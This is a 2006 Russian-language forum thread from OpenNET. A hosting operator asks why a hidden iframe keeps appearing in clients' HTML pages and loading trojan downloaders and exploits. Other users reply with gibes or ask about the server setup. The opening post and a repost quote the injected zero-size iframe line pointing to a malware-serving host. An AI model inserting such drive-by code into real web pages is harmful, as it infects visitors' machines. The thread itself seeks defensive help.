форумы  помощь  поиск  регистрация  майллист  ВХОД  слежка

Вариант для распечатки		Пред. тема | След. тема
Форумы OpenNET: Виртуальная конференция (Public)
Изначальное сообщение		[Проследить за развитием треда]

"эксплойты и трояны"

Сообщение от visitor (ok) on 30-Авг-06, 16:06

Здравствуйте. У моих клиентов хостинга периодически возникают проблемы сабжа. На их страницах появляется следующее: <iframe src="http://zetbvdpbjh.biz/dl/adv646.php" width=0 height=0></iframe> Подгружаются a.exe - модифицированный  Win32/TrojanDownloader.Small.DIB троян Win32/TrojanDownloader.Small.DIB троян JS/Exploit.CVE-2005-1790.J Win32/Exploit.WMF троян и еще всякая дрянь. Из-за этого банят домены, мыла... Код с ифреймом появляется постоянно на любых страницах. Каждый раз приходиться рекурсивно искать этот код на их старницах и удалять... Но потом все заново повторяется. Может кто-нибудь объяснить почему это происходит, где искать дыру, как с этим бороться. Заранее спасибо.

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

Сообщения по теме

[Сортировка по времени, UBB]

1. "эксплойты и трояны"

Сообщение от bestia (??) on 30-Авг-06, 17:13

Может стоит перестать притворяться хостером, а пойти поучиться, чтобы проблем не возникало?

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

2. "эксплойты и трояны"

Сообщение от visitor (ok) on 30-Авг-06, 17:37

>Здравствуйте. >У моих клиентов хостинга периодически возникают проблемы сабжа. >На их страницах появляется следующее: ><iframe src="http://zetbvdpbjh.biz/dl/adv646.php" width=0 height=0></iframe> >Подгружаются >a.exe - модифицированный  Win32/TrojanDownloader.Small.DIB троян > Win32/TrojanDownloader.Small.DIB троян > JS/Exploit.CVE-2005-1790.J > Win32/Exploit.WMF троян >и еще всякая дрянь. >Из-за этого банят домены, мыла... >Код с ифреймом появляется постоянно на любых страницах. Каждый раз приходиться рекурсивно >искать этот код на их старницах и удалять... Но потом все >заново повторяется. >Может кто-нибудь объяснить почему это происходит, где искать дыру, как с этим >бороться. >Заранее спасибо. Кто-нибудь может помочь с решением проблемы сабжа? В отличии от умника bestia

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

3. "эксплойты и трояны"

Сообщение от novachok (??) on 30-Авг-06, 18:33

а на чем у твоих клиентов их творение писано? может там дыр полно? вообщем надо определиться через что лезут: через дырявые страницы или через дырявый хостинг.

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

	4. "эксплойты и трояны"
	Сообщение от visitor (ok) on 01-Сен-06, 13:16
	>а на чем у твоих клиентов их творение писано? может там дыр >полно? > >вообщем надо определиться через что лезут: через дырявые страницы или через дырявый >хостинг. я просканировал все страницы клиентов. Эксплоиты встречаються только в *.html, *.htm, *.shtml страницах.
	Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

	5. "эксплойты и трояны"
	Сообщение от Kirill_AG (??) on 01-Сен-06, 14:23
	>>а на чем у твоих клиентов их творение писано? может там дыр >>полно? >> >>вообщем надо определиться через что лезут: через дырявые страницы или через дырявый >>хостинг. > >я просканировал все страницы клиентов. Эксплоиты встречаються только в *.html, *.htm, *.shtml >страницах. Хостинг - понятие расплывчатое. Если вы что-то соображаете, то наверное должны уже догадаться, что надо было бы рассказать что вы под хостингом понимаете, какая система, что на неё накручено и т.д. До этого вам никто не поможет. Попробуйте представить себя человеком, который понятия не имеет о том, что у вас и как, и прочтите свой вопрос. ps: Есть ли в системе процессы левые? Используются ли какой-либо готовый форум на пехепе? и т.д. и т.д.
	Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

Архив | Удалить	Индекс форумов | Темы | Пред. тема | След. тема
Оцените тред (1=ужас, 5=супер)? [ 1 | 2 | 3 | 4 | 5 ] [Рекомендовать для помещения в FAQ]